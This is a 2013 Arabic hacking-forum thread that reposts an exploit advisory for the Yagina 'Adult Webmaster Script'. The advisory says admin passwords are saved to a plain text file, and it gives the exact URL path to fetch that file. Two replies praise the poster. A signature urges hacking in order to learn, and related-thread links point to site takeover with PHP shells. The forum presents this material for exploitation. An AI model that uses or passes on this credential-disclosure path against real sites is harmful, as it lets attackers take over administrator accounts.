Adult Webmaster Script Password Disclosure Vulnerability

ثغرات المواقع والسيرفرات وكيفية استغلالها وشروحات مع تطبيقات عملية على استغلال الثغرات وتطبيقها


إضافة رد
قديم 02-04-2013
  #1
virus_of_jordan
SQ-TeAm
 الصورة الرمزية virus_of_jordan
 
تاريخ التسجيل: Jan 2010
الدولة: jordan
المشاركات: 5,065
شكراً: 708
تم شكره 581 مرة في 379 مشاركة
Exclamation Adult Webmaster Script Password Disclosure Vulnerability



كود PHP:
# Exploit Title: Yagina.com Adult Webmaster Script Admin  Password Disclosure
# Category:webapps
# Description software : software website for webmasters promoting adult companies through referrals
# Date: 21-1-2013
# Exploit Author: Dshellnoi Unix
# Vendor Homepage: http://www.yagina.com/
# Software Link:  http://sourceforge.net/projects/adultweb/?source=dlp
 
#-----------------------------VULNERABIlITY DESCRIPTION------------------------------------#
The failure comes from saving passwords in a text file with php fwrite function,
 
that can be read by the url
 
#---------------------------------EXPLOIT---------------------------------------------------#
#exploit
http://[url]/admin/userpwdadfasdfre.txt
#-------------------------------------------------------------------------------------------#
#Thanks to : Luisfer ,Ivan sanchez, Juan carlos garcia 
__________________

virus_of_jordan غير متواجد حالياً  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ virus_of_jordan على المشاركة المفيدة:
قديم 02-19-2013
  #2
طائر العنقاء
فلسطين وطني
 الصورة الرمزية طائر العنقاء
 
تاريخ التسجيل: Apr 2008
الدولة: ||- أبحث عن وطني بين ركام الارض -||
العمر: 33
المشاركات: 3,648
شكراً: 437
تم شكره 623 مرة في 424 مشاركة
افتراضي رد: Adult Webmaster Script Password Disclosure Vulnerability

روعة انت محمد وكل ما تاتي به رائع
__________________

أنا لا أكره الناس ... ولا أسطو على أحد




ولكني إذا ما جعت ... آكل لحم مغتصبي

حذاري من جوعي ومن غضبي

All Things Are Difficult Before They Are Easy

ραℓєѕтιηє ρнσєηιχ


طائر العنقاء غير متواجد حالياً  
رد مع اقتباس
قديم 11-22-2014
  #3
Cwne
Administrator
 الصورة الرمزية Cwne
 
تاريخ التسجيل: Mar 2004
الدولة: Palestine
المشاركات: 424
شكراً: 275
تم شكره 94 مرة في 83 مشاركة
افتراضي رد: Adult Webmaster Script Password Disclosure Vulnerability

حقاً . كل ما تأتي به مميز جداً.
بارك الله فيك . وبعطيك العافية
__________________
!! لآ تتعلم لتخترق ~ إخترق لتتعلم !!
Cwne غير متواجد حالياً  
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
SQL Injection Vulnerability H@CK3R M!ND عالم الثغرات - Vulnerabilities World 6 12-21-2009 08:17 PM
SQL inject to php script Salmoka اسأل ونحن نجيب 1 09-30-2009 06:16 PM
التحكم الكامل بالمواقع عن طريق php shell script أكس مان المبتدئين .. ابدأ بتعلم الهكر من هنا 20 08-21-2008 04:33 PM
التحكم الكامل بالمواقع عن طريق php shell script Fr0zen W0rld اختراق المواقع والسيرفرات 1 01-25-2008 06:15 PM
التحكم الكامل بالمواقع عن طريق php shell script X_moon اختراق المواقع والسيرفرات 1 09-10-2004 01:45 PM


الساعة الآن 05:25 PM.